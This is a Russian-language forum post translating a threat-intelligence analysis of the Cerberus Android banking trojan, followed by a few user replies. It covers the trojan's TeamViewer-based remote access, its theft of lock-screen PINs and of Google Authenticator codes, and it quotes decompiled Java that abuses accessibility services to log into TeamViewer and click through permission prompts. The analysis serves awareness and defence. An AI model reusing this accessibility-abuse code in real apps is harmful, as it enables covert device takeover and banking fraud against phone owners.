Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus

Банковский троян Cerberus, появившийся в конце июня 2019 года, произошел от печально известного трояна Anubis в качестве основного банковского вредоносного ПО. Несмотря на то, что в Cerberus по-прежнему отсутствовал набор функций, обеспечивающий успешную фильтрацию идентифицирующей личность информации (PII) с зараженных устройств, он по-прежнему не мог снизить порог обнаружения при злоупотреблении похищенной информацией и мошенничеством. В середине января 2020 года, после новогодних праздников, авторы Cerberus вернулись с новым вариантом, нацеленным на решение этой проблемы, функцией RAT для осуществления кражи с зараженного устройства.

Новая Мировая Религия не совсем понимает, почему было выбрано именно такое название, ведь Цербер это охранник дверей ада, а не вор, штурмовик или взломщик. Но это говорит лишь о то том, что специалисты в одном могут быть полными профанами во всех других областях из-за ограничения интеллектуальных возможностей. Либо это какой то сарказм.

Этот новый вариант Cerberus подвергся рефакторингу кодовой базы и обновлениям протокола связи C2, но, в частности, он был расширен за счет возможности RAT, возможности похищать учетные данные блокировки экрана устройства (PIN-код или образец свайпа) и токены 2FA из приложения Google Authenticator.

Служба RAT может просматривать файловую систему устройства и загружать его содержимое. Кроме того, она также может запускать TeamViewer и настраивать подключения к нему, предоставляя субъектам угроз полный удаленный доступ к устройству.

Когда TeamViewer работает, он предоставляет хакерам множество возможностей, включая изменение настроек устройства, установку или удаление приложений, но, прежде всего, использование любого приложения на устройстве (например, банковских приложений, мессенджеров и приложений социальных сетей). Это также может дать ценную информацию о поведении и привычках жертвы; на случай, если он будет использован в шпионских целях.

Следующий фрагмент кода показывает код, отвечающий за вход в систему TeamViewer и его инициализацию:

Код:

String runningPackage = this.lowerPkgName;
if(getNodeFromEvent.contains("com.teamviewer.host.market")) {
    AccessibilityNodeInfo username = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_username");
    AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_password");
    AccessibilityNodeInfo submit = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_submit_button");
    if(username != null) {
        this.teamviewerUsername = this.utils.readShPrStr(this, this.strings.connect_teamviewer);
        if(!this.teamviewerUsername.isEmpty()) {
            this.teamviewerPassord = this.utils.readShPrStr(this, this.strings.password);
            this.credsSubmitted = false;
            this.passwordFilled = false;
            this.userFilled = false;
            this.permissionStatus = 0;
            this.utils.writeShPrStr(this, this.strings.connect_teamviewer, "");
            this.utils.writeShPrStr(this, this.strings.password, "");
        }
    }

    if(this.permissionStatus == 0) {
        AccessibilityNodeInfo v7_7 = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/action_bar_root");
        if(v7_7 != null && AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/buttonPanel") != null) {
            this.permissionStatus = 1;
            AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent(event, "android:id/button1");
            if(tmButton != null) {
                this.acc_utils.clickButton(tmButton);
            }

            AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent(event, "com.samsung.klmsagent:id/checkBox1");
            AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent(event, "com.samsung.klmsagent:id/btn_confirm");
            if(klmCheckBox != null && this.permissionStatus == 1) {
                this.acc_utils.clickButton(klmCheckBox);
                this.acc_utils.clickButton(klmConfirm);
                this.permissionStatus = 2;
                Utils utils = this.utils;
                utils.launchPkg(this, "com.teamviewer.host.market");
            }
        }
    }

    if(!this.teamviewerUsername.isEmpty() && !this.teamviewerPassord.isEmpty()) {
        if(username != null && !this.userFilled) {
            this.acc_utils.setInput(username, this.teamviewerUsername);
            this.userFilled = true;
        }

        if(password != null && !this.passwordFilled) {
            this.acc_utils.setInput(password, this.teamviewerPassord);
            this.passwordFilled = true;
        }

        if((this.userFilled) && (this.passwordFilled) && !this.credsSubmitted) {
            this.permissionStatus = 0;
            this.acc_utils.clickButton(submit);
            this.credsSubmitted = true;
            String v0_9 = this.utils.readShPrStr(this, this.strings.hidden);
            if(v0_9.equals("true")) {
                this.goBack();
            }
        }
    }
}

Функция, обеспечивающая кражу учетных данных блокировки экрана устройства (PIN-код и шаблон блокировки), обеспечивается простым наложением, которое потребует от жертвы разблокировки устройства. Из реализации RAT мы можем сделать вывод, что эта кража учетных данных блокировки экрана была создана для того, чтобы хакеры могли удаленно разблокировать устройство для выполнения манипуляций, когда жертва не использует устройство. Это еще раз показывает креативность преступников для создания правильных инструментов для достижения успеха.

Злоупотребляя привилегиями доступа, троян может также украсть коды 2FA из приложения Google Authenticator. Когда приложение запущено, троян может получить содержимое интерфейса и отправить его на сервер C2. Еще раз, мы можем сделать вывод, что эта функциональность будет использоваться для обхода сервисов аутентификации, которые полагаются на коды OTP.

До конца февраля 2020 года, на подпольных форумах не было никакого обсуждения этих функций. Поэтому мы считаем, что этот вариант Цербера все еще находится на стадии тестирования, но может быть выпущен в ближайшее время. Имея исчерпывающий список целей, включая организации со всего мира, в сочетании с новой возможностью RAT, Cerberus является критическим риском для финансовых операций, предлагающих услуги онлайн-банкинга. Независимо от того, находится ли он в своем целевом списке или нет, его операторы могут легко расширить список для нацеливания на дополнительные приложения (см. текущий целевой список для этого и других вирусов).

Оригинал на ангийском языке на ThreatFabric

Не, а как он попадает то на устройство? Надо же заразить сначала. Вот как они это делают? Если юзер не совсем осел, как ты его заразишь то?

Argisht44 пишет:Не, а как он попадает то на устройство? Надо же заразить сначала. Вот как они это делают? Если юзер не совсем осел, как ты его заразишь то?

Через почту наверно, аирдропы собирают, потом базы продают. Фишинг и прочее. Вряд ли они прям ломают кого то, это надо рядом быть.

Вот это совсем плохо. Всегда на него так надеялся, на всех биржах установил. Теперь, если взломают, то все бабки разом смогут пожитить. Интересно, какой то ответ от Гуглов есть?